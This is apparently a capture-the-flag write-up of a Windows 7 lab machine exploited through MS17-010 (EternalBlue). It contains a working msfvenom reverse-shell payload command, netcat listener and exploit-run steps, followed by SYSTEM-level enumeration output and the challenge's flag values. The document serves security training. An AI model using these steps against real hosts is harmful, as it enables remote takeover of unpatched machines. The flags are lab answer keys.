Nmap Results
# Nmap 7.92 scan initiated Sun Aug 14 19:46:21 2022 as: nmap -T5 -p- -oA scan -Pn 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.017s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
32021/tcp filtered unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
60080/tcp filtered unknown
# Nmap done at Sun Aug 14 19:46:52 2022 -- 1 IP address (1 host up) scanned in 30.51 seconds
Service Enumeration
TCP/139,445
nmap
OS detection identifies this host as Microsoft Windows Server 2008 SP1
, while the SMB headers say the host is Windows 7 Professional 7601 Service Pack 1
. Either way, given the host operating system and unenforced SMB signing, this looks like a perfect candidate for MS17-010
(Eternal Blue); no coincidence given the name of the box.
Exploit
Search Google for public exploits on GitHub: site:github.com "ms17-010"
. This repo should work perfectly for our target operating system.
The send_and_execute.py
exploit will allow us to generate a malicious binary, transfer it to the target, and execute via named pipe.
git clone <repo url>
cd MS17-010
- Edit
send_and_execute.py
and changeUSERNAME = ''
toUSERNAME = ' '
(with aspace
), to allow anonymous authentication - Generate a payload:
msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pwn.exe
- Start a netcat listener on your specified port
- Run the exploit:
python2 send_and_execute.py target-ip binary.exe

Post-Exploit Enumeration
Current User
Click to expand
whoami
nt authority\system
OS & Kernel
Click to expand
systeminfo
Host Name: HARIS-PC
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: haris
Registered Organization:
Product ID: 00371-222-9819843-86066
Original Install Date: 14/07/2017, 14:45:30
System Boot Time: 15/08/2022, 01:49:12
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,576 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,546 MB
Virtual Memory: In Use: 549 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 178 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2479943
[06]: KB2491683
[07]: KB2506014
[08]: KB2506212
[09]: KB2506928
[10]: KB2509553
[11]: KB2533552
[12]: KB2534111
[13]: KB2545698
[14]: KB2547666
[15]: KB2552343
[16]: KB2560656
[17]: KB2563227
[18]: KB2564958
[19]: KB2579686
[20]: KB2603229
[21]: KB2604115
[22]: KB2620704
[23]: KB2621440
[24]: KB2631813
[25]: KB2639308
[26]: KB2640148
[27]: KB2654428
[28]: KB2660075
[29]: KB2667402
[30]: KB2685811
[31]: KB2685813
[32]: KB2690533
[33]: KB2698365
[34]: KB2705219
[35]: KB2719857
[36]: KB2726535
[37]: KB2727528
[38]: KB2729094
[39]: KB2732059
[40]: KB2732487
[41]: KB2736422
[42]: KB2742599
[43]: KB2750841
[44]: KB2761217
[45]: KB2763523
[46]: KB2770660
[47]: KB2773072
[48]: KB2786081
[49]: KB2791765
[50]: KB2799926
[51]: KB2800095
[52]: KB2807986
[53]: KB2808679
[54]: KB2813430
[55]: KB2834140
[56]: KB2840631
[57]: KB2843630
[58]: KB2847927
[59]: KB2852386
[60]: KB2853952
[61]: KB2861698
[62]: KB2862152
[63]: KB2862330
[64]: KB2862335
[65]: KB2864202
[66]: KB2868038
[67]: KB2868116
[68]: KB2871997
[69]: KB2884256
[70]: KB2891804
[71]: KB2892074
[72]: KB2893294
[73]: KB2893519
[74]: KB2894844
[75]: KB2908783
[76]: KB2911501
[77]: KB2912390
[78]: KB2918077
[79]: KB2919469
[80]: KB2929733
[81]: KB2931356
[82]: KB2937610
[83]: KB2943357
[84]: KB2952664
[85]: KB2966583
[86]: KB2968294
[87]: KB2970228
[88]: KB2972100
[89]: KB2973112
[90]: KB2973201
[91]: KB2973351
[92]: KB2977292
[93]: KB2978120
[94]: KB2978742
[95]: KB2984972
[96]: KB2985461
[97]: KB2991963
[98]: KB2992611
[99]: KB3003743
[100]: KB3004361
[101]: KB3004375
[102]: KB3006121
[103]: KB3006137
[104]: KB3010788
[105]: KB3011780
[106]: KB3013531
[107]: KB3019978
[108]: KB3020370
[109]: KB3021674
[110]: KB3021917
[111]: KB3022777
[112]: KB3023215
[113]: KB3030377
[114]: KB3035126
[115]: KB3037574
[116]: KB3042553
[117]: KB3045685
[118]: KB3046017
[119]: KB3046269
[120]: KB3054476
[121]: KB3055642
[122]: KB3059317
[123]: KB3060716
[124]: KB3067903
[125]: KB3068708
[126]: KB3071756
[127]: KB3072305
[128]: KB3074543
[129]: KB3075220
[130]: KB3078601
[131]: KB3078667
[132]: KB3080149
[133]: KB3084135
[134]: KB3086255
[135]: KB3092601
[136]: KB3092627
[137]: KB3093513
[138]: KB3097989
[139]: KB3101722
[140]: KB3107998
[141]: KB3108371
[142]: KB3108381
[143]: KB3108664
[144]: KB3109103
[145]: KB3109560
[146]: KB3110329
[147]: KB3121255
[148]: KB3122648
[149]: KB3124275
[150]: KB3126587
[151]: KB3127220
[152]: KB3133977
[153]: KB3137061
[154]: KB3138378
[155]: KB3138612
[156]: KB3138910
[157]: KB3139398
[158]: KB3139914
[159]: KB3140245
[160]: KB3147071
[161]: KB3150220
[162]: KB3155178
[163]: KB3156016
[164]: KB3156019
[165]: KB3159398
[166]: KB3161102
[167]: KB3161949
[168]: KB3161958
[169]: KB3170455
[170]: KB3170735
[171]: KB3172605
[172]: KB3177467
[173]: KB3179573
[174]: KB3181988
[175]: KB3184143
[176]: KB4014504
[177]: KB976902
[178]: KB982018
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.40
[02]: fe80::6808:33f:815b:2d67
[03]: dead:beef::e02a:2e51:2801:1436
[04]: dead:beef::6808:33f:815b:2d67
Users
Click to expand
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest haris
The command completed with one or more errors.
Groups
Click to expand
Unable to enumerate due to system error
Network
Interfaces
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::6808:33f:815b:2d67
Temporary IPv6 Address. . . . . . : dead:beef::e02a:2e51:2801:1436
Link-local IPv6 Address . . . . . : fe80::6808:33f:815b:2d67%11
IPv4 Address. . . . . . . . . . . : 10.10.10.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:35eb%11
10.10.10.2
Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix .
ARP Table
N/A
Routes
N/A
Open Ports
N/A
Ping Sweep
N/A
Processes
Click to expand
N/A
Scheduled Tasks
Click to expand
N/A
Privilege Escalation
Vulnerable service is running as the SYSTEM account, therefore code execution yields a reverse shell running at the highest integrity level.
Flags
C:\Users\haris\Desktop\user.txt
5ad820847258b5bb4bc46c50cf97a993
C:\Users\Administrator\desktop\root.txt
ee0913e6c608b2f7376db7652524495c